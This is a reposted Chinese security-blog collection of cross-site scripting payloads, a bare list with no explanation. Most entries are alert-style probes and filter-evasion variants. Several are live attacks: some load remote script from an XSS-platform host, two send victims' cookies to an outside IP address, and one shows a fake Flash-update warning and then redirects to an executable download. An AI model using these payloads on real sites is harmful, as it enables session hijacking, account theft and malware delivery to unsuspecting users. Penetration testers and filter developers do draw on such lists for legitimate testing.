xss payload集合

admin 2023年2月17日 00:20:58

<script>alert(1)</script>

<script>prompt(2)</script>

<script>confirm(3)</script>

<script>console.log(3)</script>

<script>document.write(1)</script>

<script>console.log(3)</script>

<script>document.write(1)</script>

<script src=//xsshs.cn></script>

<img src onerror=appendChild(createElement("script")).src="//xsshs.cn/aaaa">

<img src onerror=jQuery.getScript("//xsshs.cn/aaaa")>

<script>window.location.href="http://2.2.2.2/?msg="+escape(document.cookie)</script>

<script>document.body.appendChild(document.createElement("img")).src="http://2.2.2.2/?msg="+escape(document.cookie)</script>

<script>alert("您的flash版本过低,请更新您的flash版本"); window.location.href ="https://www.flash.cn/cdm/latest/flashplayer_install_cn.exe"</script>

name=<script>alert(1)</script>

name="><script>alert(1)</script>

name=1" id=javascript:alert(1) autofocus onfocus=location=this.id xx="

name=javascript:alert(1)

name=</script><script>alert(1)</script>

name=';alert(1)//

name='-alert(1)-'

name=';};alert(1);function a(){a='

<?xml version="1.0"?><a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(/XSS/)'></a>

<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(1);</html:script></html:html>

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve">  <image id="image0" width="751" height="751" x="0" y="0"

    href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAu8AAALvCAIAAABa4bwGAAAAIGNIUk0AAHomAACAhAAA+gAAAIDo" />

<script>alert(1)</script>

</svg>

<script>alert`1`</script>

<video src onerror=a="%2",location="javascript:aler"+"t"+a+"81"+a+"9">

<video src onerror="javascript:window.onerror=alert;throw 1">

<video/src/onerror=top.alert(1);>

<video/src/onerror=top[`al`+`ert`](1);>

<video/src/onerror=self[`al`+`ert`](1);>

<video/src/onerror=parent[`al`+`ert`](1);>

<video/src/onerror=window[`al`+`ert`](1);>

<video/src/onerror=frames[`al`+`ert`](1);>

<video/src/onerror=content[`al`+`ert`](1);>

<body/onload=eval(alert(1));>

<body/onload=eval(`al`+`ert(1)`);>

<body/onload=open(alert(1));>

<body/onload=document.write(alert(1));>

<body/onload=setTimeout(alert(1));>

<body/onload=setInterval(alert(1));>

<body/onload=Set.constructor(alert(1))()>

<body/onload=Map.constructor(alert(1))()>

<body/onload=Array.constructor(alert(1))()>

<body/onload=WeakSet.constructor(alert(1))()>

<body/onload=constructor.constructor(alert(1))>

<video/src/onerror=[1].map(alert);>

<video/src/onerror=[1].map(eval('al'+'ert'));>

<video/src/onerror=[1].find(alert);>

<video/src/onerror=[1].every(alert);>

<video/src/onerror=[1].filter(alert);>

<video/src/onerror=[1].forEach(alert);>

<video/src/onerror=[1].findIndex(alert);>

<img src onerror=_=alert,_(1)>

<img src alt=al lang=ert onerror=top[alt+lang](1)>

<img src onerror=top[a='al',b='ev',b+a]('alert(1)')>

<img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>

<video/src/onerror=Function('ale'+'rt(1)')();>

<svg/onload=javascript:alert(1)>

<iframe src=javascript:alert(1)>

<form action=javascript:alert(1)><input type=submit>

<a href=javascript:alert(123);>xss</a>

<iframe src=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=>

<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=></object>

<embed src=data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+>

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==">

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<input onfocus=alert(1) autofocus>

<h1 onmousemove="alert(1)">title</h1>

<select onfocus=alert(1) autofocus>

<iframe src="vbscript:msgbox(1)"></iframe> 

<iframe src="javascript:alert(1)"></iframe>

<iframe src="vbscript:msgbox(1)"></iframe>

<iframe onload=alert(1)></iframe>

<iframe src="data:text/html,<script>alert(0)</script>"></iframe> 

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe> 

</iframe><iframe src="vbscript:msgbox(1)"></iframe>

</iframe><iframe src="data:text/html,<script>alert(0)</script>"></iframe>

<details open ontoggle=prompt(/xss/)>

<plaintext/onmouseover=prompt(1)>

javascript://comment%250aalert(1) 

<img src=x onerror=confirm(1)>

<video><source onerror=alert(1)>

<audio src=x onerror="alert(1)">

<body onload=alert(1)>

<body onscroll=alert(1);><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<textarea onfocus=alert(1) autofocus>

<svg/onload=alert(1)>

<details open ontoggle=confirm(0)> 

<svg><script>alert&#x28;1)</script>

<svg onafterprint=prompt(1)>

<svg onbeforeprint=prompt(1)>

<svg onbeforeunload=prompt(1)>

<svg onerror=prompt(1)>

< img onundo=prompt(1)>

<svg onchange=prompt(1)>

<details/open/ontoggle=(confirm)()//

<img src="#" onmouseover="alert('xss')">

<input onfocus=write(1) autofocus>

<a href=https://baidu.com>aaa</a>

<scRipt>alert('sss')</ScRiPt>

"-prompt(1)-"

'-prompt(1)-'

";alert(document.domain);/*;var%20dk4trin="*/";

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

<code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>x3csVg/<sVg/oNloAd=alert()//>x3e

<script>top[`al`+`ert`](1);</script>

<img src="x" onerror="top[`al` + `ert`](123);">

<svg onload='top["al"+"ert"](1);'>

<video/src/onerror=[1].findIndex(alert);>

<input type="hidden" accesskey="X" onclick="alert(1)";> 按 Alt+Shift+X 触发(需要用户主动按下快捷键;具体组合键因浏览器和操作系统而异)

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click


原文始发于微信公众号(爱喝酒烫头的曹操):xss payload集合

admin
  • 本文由 发表于 2023年2月17日00:20:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xss payload集合https://cn-sec.com/archives/1274807.html
